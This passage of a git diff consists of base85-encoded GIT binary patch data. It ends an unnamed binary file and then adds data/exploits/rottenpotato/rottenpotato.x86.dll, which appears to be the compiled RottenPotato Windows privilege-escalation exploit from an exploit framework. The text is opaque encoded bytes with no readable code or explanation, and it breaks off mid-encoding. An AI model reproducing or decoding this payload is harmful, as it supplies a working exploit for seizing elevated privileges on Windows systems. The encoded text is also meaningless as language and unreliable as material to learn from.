z-T+^lgfCLhZSb=5l8jDl53EIL*WxqqiSw}u?}kr)FNulGc)|RvB*Ra50UUdQDt7{G zLDH61DEIV}a)lL0+P)6Ty#(##FPwuU+y-w#QvU$la4~b4IKqu69b0I+M72wJwYKf> z5p8$E9Z2%r3GI_rUkTqqK^Of4H(S&?BMe@u=8kX|lItGAcc$VKl-mb=(^Q^9$8;6n z2_Hn(rK}aOa0d0{Ok#(}%uF)!2sgvoDBec6*@{gagga1t9fs?_&-h7u;m1hUr2)9( zGU`V@Mh@koUgCIQAL=4pxN$b&*us7!WyLv%J|sK`mLe(31rN6=pESXrAUR71;qQ_7 zWG_783dVqX%6$_rLz1W5gK(|3<$i}RXxo^}I3rnegg51~#*#Jw|BNKh)I8QgBy|v; zFi*wb3Cr?T96xl=r>rvC2#+dI{g4JPLQ;opxC}|2yWoPW*gJ^75I%_}VQ+$C7pSsI zV70b|oePtUX~YqpR;b2n1^n6~`hoB?xDaJ|$P+q?S$i2%;o&9pvzzgSg${h9oc@Qo zi&Z`I;AuT}M>yY$`51x3fs*f2?M=}SkaLUpo zBSN{;;Aj{1#1>{E=@a1sZ7+n+AnBjYFtdy~OIw8I>*y=W6)s0o?g}{GtNb|w?nV~U z3O}k~eIR~`k3O#?Ps;6q>C4pE34gr;Un2i4FzIII8+Ix@4N2WH;8Y}KO@lY1C~*St z_ox@U7pAOK@l)ZYNa{Zgx^=h*-mmQq@c01zK-#fzBXVMQ!lQ3t4q&IjGm(^=37@E1tx&;=*`P{kMi1Z^OG5N_7t z!jsqP`oJAX%Gw22uT$&cM!4!nYTVbrN0H>;3E$H8PIzVzza{@n_-nKVdkb8Ahq9gU zT_kPqgC%#WeOy?FB+oFs{4UiN8w{>j`;O4}Q|2UjRzdGQ*mB(l9#zfwvcHUh&mmb? zyWv&$s5~EYqX$)=tM)KB>bu!NbC;ZVO?vwp-za z^(tKMlX@eP{8zvywJrBI{Y=|(FVc$|RGe(M3~i+jes~x1V230ONk0gWX`+8B=ufx` zWn!;^wibMV_`;n?+AB1*s{DnS+7|9aZJL z@Q`jJ-1BqBg?vm8Q-37w^}~*h?7^gs!kkCcxi<=rdsO*VI=mc7o;J7|N!m4V6Ouhh z_#u*OR=eRxk1;nWYXCmhiC>X_Cp`ZN!m+d9;hR`vu}yI1Q_LyiTZK<6zY-q(3sr|S zXgtF@MjT-mO7$@};h&yW@%v!fFO%YR8w*z=>7Odty;=GH0NnH(dk1NSv!7>fETdg; z!LJy{O7Go1A*Yd&#u;4?_(?`HVYR@y~)56t|X znmfXK(H`0rft!%5&jT?151eTT7ruxF$iD|(_8MhL{_wolRo$#GfTUf*r`}Ng*#-ZG zr0u(*ZJYKJ*n%Xy6&~@X3Lgz;YTF9eXj^#tcKV0=zzoX_?3A`K0HH2!I^)4bG;fKhAy&KN_6TXCPh4&!Ivl<@L zr|dECMkMW80k`Pz9+>oJ6(<#*i6l-otVA+L{IKyaw2k~D@b^gK^ud<**kiC;;U`GK z2jE4!RGxY80d0riE^QCMiSILy$a50>88ZB=Mer}Ehj7zhlZ;c5BB{@M7)9a_ z!k1AdX$wA}Pml+DH@vZ*c-Sl8ZAju*!4R@aS@4^GQ~9UEpCDs7^Btc0cU6BE>_!&C zh4+4#WVB*O;F#U`7Pj#GkCfkLLF>oL7FHsue;B@tqz--X!B142Fr4=(<=#O3VHC;O z3ExGM*7yhKUL>H2L1h85Pb&QinWv z50bRi@S?Br>?}SvWy2Rx4{5i+OL%6G)ZYSMLDGj?;dY)Smqng2nDI^Oj4j-G9M5=> z>(cNS$5R&JU2y%ks1KjHgddFM8IUEMAK=B`rmu-(fk&N`Z1}O$;A2R}x)ZK5t8n3> zlau3nN(sE+6vk^lb%tLcx#n-2$}^TwgnUZiZX}-{Q^zG63s5iN3*mi8+O+{5{hj3a z^{X`a8Zxb5tl_Bfs-7lzFESIp0ltqWVfVxDW~lz009PW(GXU>I;@j(CgSI2E3rYVA zd$le6^z>xIPM-2?ndRT5?bk8i;rqx(_-=UW87i$6-ihM*!v<|f;1k-GXTm)=$mL4e3xf{ZX`}0Jp2+}H#iSTo(1qa9qxk@CM&-ZE=MwsE8q)A+O-A#RongW zIExBThf|Q`X@hH#q+JjHp~K~V>=#W@aTdZ8FHJU#n^O%lY($ba0t;r+&(vSoF^lIS z5+@2*eLp$=y-x_*FJlf8M|jO_!ii&t-=9N1gy+ERJQH+1b_|}9OPpZEt|y`KoR{_&Aa{n_zN*vQy#rwVeYW zK+-=Um~>@wd@iTLbCG-(FbR6m8p;j97z#>#;1^e^`j1(VY`Bq>RRy0z87tY>pl_j? z%V9YAYUUexTHrQq3+>mijuT(F4M{#iSD~t#@G3h#M!5^&uaVSw3!GELydc~L3yXRF zHMSl87D+xma8Ze}OW<~g@{<_6(#d)vdBQi4MaqRAUrRqTHwR$zQdL$fysS*+lLN<> ztN0nPQ`^F6Zk50Acn|F%|FQ6x>+qj^_H_6lswO-HKl3sVX?to#veANM&2NRjL2?an z3;aymd*G!$m46<*5xGda25v^uC&B@=j&P$gnQJC$jQnsjk~a22$MtGld@$zcd3D4W zp1xeQaRRJH@jPMRMz!_|-$K&2JKG`1+``(9y%3(iTGhb{S0NMOo8jm+%wKFXoQfp>X)sUQ!g?fi zj>1cBRdyb9B8e~bYkM8spl#u?x2b*`0}GMlS5 zB8k5OzKoD}TlL^~U5B9h_m}^M-&tTyXSy zHTQ)@Nb)Ixk867qJmzi{J_fEp7O5NDjpVl_!W}mC&+2d+l4Cai%+RI9Vc zXgC{58*MQ8-ehAdZApdGkc11*z7PMuh4#WT?pJ%?1h@nZ5Z?(SNa`#cyFs0Wgr!Kr zU9kB9{DFL0;UAFnPcJoYo7-=gfP zgl~i6ey+~g!UYer{t~_r{%j*-gdKu!J(_Inq0T$uk&mf5WW)dHRP`JUrz6=H^5Ff* zN7@Z=Cz84uk0%@7Lt;DObx-2c#PPv3o9IKX5tCjAEA zX3bBB7bEF&3!M6b>Z=_17LvN{gxq>G9%nQRAqf|LfMo3Y;dw98Ua3D^jO^G|@Z=um z4t5T_1Bq|1hvt`A{|Og9ggUV|!cDKzmNl%0@R_ab7ucI&?03o*&iw;@LUudv-m?4p7x%~-v)0(G6$ouV3*2A*o~Z|6=uG#>M8sHiLVZQ zW~)5Qb=}|b87T`sjbhkc@QlNF9xC<(_%M=j-v~Po=Q$#T3qvLqF8l&XTZ|)k9x2Zx zHExsN1Ed&!B=r=&ge0FH*voTxO~euYfM>6!V-J1qsyvT%0nc;YK)7%r>ck%UTvvJC z>-EQ^7zKn2*P|8K!o^=tiTj=t9(HVs(M@<7Y(VnaHUfWvq|RONQ*G~oH}ecv@!J6O ze1p1@R(QlWRsF}pN)+MqpdUVniC#tl<9Bm6XXxsj6o^?Df#c-0(Xjq1% zEDvl!Qs-8<1xdLv*pK|g&-_k`F%wC+6<(=rC+tL$kMPLTlx>F}XQUVb(i*1|hGY*C zK8j>M_P~wBF@nSq zX7lXVDCG(lBB`?<9>ud?ZNy1~naGbVd>YBMg)aERiM&VnI`|=yv>E5780|>**-rQy zB;oyV3eQEYrvB65MijzMIC*jb z$T$&+Exb_MLD;Bm;V-o<{1lDD_k`cMK&2Hf*0%6ww3|5X@FgAocX;%LD*i+`N81aa zU)yV7jkZ@`MEj7`P56|yg*&wU8BEVsafAgT`c_z}!-bD(`&sz5wuQ+TtF*$Cv@Oim z_6_hJZ3`dKws5<)KZEI)sC=?v2}(Y3Or{e2;?iNl)5?{DT+rpc)Exb$H!gg&7<+<;YR``~-g`aC%m_AL#5uT%M zp**Wx(h7^UEnJ~(p*(wD;t1ur@nQ?*`PgC$<$3913zMfSTPV*omT;jwH@S*=BwVD! zh4LKgKIX4bo#g=CnpMxYHc~-Gq+x#l;|Ni|y>jA!hqAV2HzesroAHOqB z5Pk$pqm}pUnWK!GxYR%VU-o2wnaeCUYT;fn7mq*ZtjzId?qB6D;RZPukDr$}J2IQ+={d?4xt5#BpuFPZ@s-~43oE!oPFYdKnPsKL zUU!9ivG2@cciDwS6=i2FJ7>I^rv;QQ=3X=UkrJvjvND^qecs9n9;vg~t#do&D{?#c zlz2K)a{tBn6OZ(3LcEUaD&u#w+56m}ioI_ReS7cSLUOomiOcMg|1Tb2R57c38IMi! zjyG49%5#${Xxn0*jN}+^K6`II*=LVjO7_|N)hYYzy^SMz_Su8|#*5*Dk?6IJb%Sv$ z2;0M+us<9KSA|32NH`kq4EKb4!?AE**ivt;x78Qa+v}b6o_c?MpuVa;SYKTqs*lu1 z>pSba>bvWE>U-;B^?mjI^#k=>+-}Tl%xWxXv^P2%J&pdxKx446x-rxkX^b{@Hg+|3 zH}*94HV!lz5mUq*$%te|vLcp5lY7 zdLyw&U!*@`YD;g+Xv=D|wiUEF+x%@+ZPjg&w$8Thw%)eBwt+TNdwP3Ddse%(y`bIM z?r*PZuWpaDceZ!8_qO-7544*)(mOIbvO26C1s%=~e@9hEbw{M5v!lDCx1+CPpu@0p zR-wO4q4ZEjC@W+Q6@;82f2b-{9g2iHL*1d?P+w>uWU5K8$*9SyvDOsSIBWbhRW;Q$ zk($n$?wZ~jYqPD{-t27lH2a$a&9Rogmj0H37NgbFn%0`$YHrPF&1}tTwX|AWZLI~Z z_Eu-Br`6vYXsv1uwpO=>S|hE|*3Qp-i~W@<~L_2#w!tq!(D zX*GYz;Nfh*ICfF99_kjOcKy`Ps4>-~QAabi%%q+cYHFjdc516exhvegcclBn17V}y zRG(I#UT?0?sL!m=sz3D6H#MX+q&JuwG8!@)vKlN6)&^TcL4&=)+2CpLHv}508iEbg z4WWieL$sl@p{t?0p{Jp@A=c2>(BCl7U^JQ<(;Cwo&5g>7EREJi8@^PP(1&7;eU1Iv zlhPvTU-Bk@Q=qA;DcDrq6l#hzMVmUCx|+J1dYXEhVoiNb{Y?W+Mzg6otvS8f+?>&z z*__pEY5uAa>1~VQWBqs;4iez}Nxz%%l1%)>f~VN<6+7PI30dl_b+)>KI(wb7&Qs^F z3)EHB1?#HoLUob4uDb5Jp1R(;SY2OTf89Wx5jKU>!s%giI3t`H&I((?*03#Hz`S&Z z6ZKs|lfB8=!|=YWiyiYK&S_ zZCY)5t+_U%HnTRX)>3P&wbd5X+G|6#k=kf&XKhz)cWqB?MqOrIR^9$%mmVJnk6s~z z;c8aNzOc-fwEux~#lCmlJ+xV)#>xnBE~kGpSuJdOt?;n61>&n)i1jVX3a5IvZ%Ds} z^uF;`D@v$2(j0B>Z0>6AZtiLBZH_hfHTO3UG#f3Zmb8}i7IRBROJ++}i>1ZdVrwaA zv9~x|JT3l~Kuc9iu%)^s)Dmflwsf|1wRE@iwDh*b;w!81Z(CP0+A`T$2K^pCi{fv< ztk=+g^G?H}onow^zyFoJM#jN}Z)f1wR(#r7>#wbagO$h1s^i4dtMKv&=YVd`0eyJ72~W>pN3e1haB>c) z;tUXB|LZ7N{p^Rup3v!-{l zp7*kr4>Xxr#WPsJt*mWM_S~xGYCNqIFYCp_2AWOyRtA1$#iyM3Qx(1x!H>FI7~Gx| zV>DyX&zU5RT_lt9h>f#|hjU1fGf0&4M-OKY{@$=Dt;yV!*<@+5u>yP8UxMr{QTCM{ z_LP41lQi~{O!g7k{XOjb!R8SD-i5En@N)wnH{;(HeA|v+2k_|-{@jHx$2cJvoDR&K z3@n@q?3@S!oCZRi1iCl{#5e&M?EYpv)WWK4XGIQh1_-edceVAfFZH(>?P=}i_RMw* zYqFj7IKWyQVjb>c4UVz?8mzr$)?Ev0uATKZz*-w(o$X?cjj_Jc7crho3=CFRGrO9F z9nH>e76=7Hp-?o`#R((E>B8V-VdhjJtAxGA!}<`c39&YGvFgTHaSc{mGb^oyRn}hX zsSVTyS!tuJvOTr2+WuOjF0IbYT5DmCw6i}3*c(H2QFg{2cEx^n#58upOm;$B{B#-! z2U&Ha;V#ZAG1gv#bBdWWiiOjuos(&RQ)!43X&0x_7$;GKbBMWtcBJv$0JDi*mdpHkf;0FQ5-pp8cvdfwn*#M)-KH0^08`Le6vFl;9 ztc*}6>qI7F5u*Ps)TEnPZ{^hA&Fr?&hY@-%lQUX3v(>`cJ<5Er;s1RRGyYzUkDKx6 z-sW_?H%MJf)Wm~#8k`OyoQll&TnJA~!@Gj`lhMPqMe2~jnJ7TtNImR$Nf#bss^yLU K`}g141OElbUqyWY literal 0 HcmV?d00001 diff --git a/data/exploits/rottenpotato/rottenpotato.x86.dll b/data/exploits/rottenpotato/rottenpotato.x86.dll new file mode 100644 index 0000000000000000000000000000000000000000..0963215dab11dfac020ff9ca0f065b267dcd14d2 GIT binary patch literal 251392 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

hfWhMC4vMJK5Um5T`{Il{jeErm%U=0~KR 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 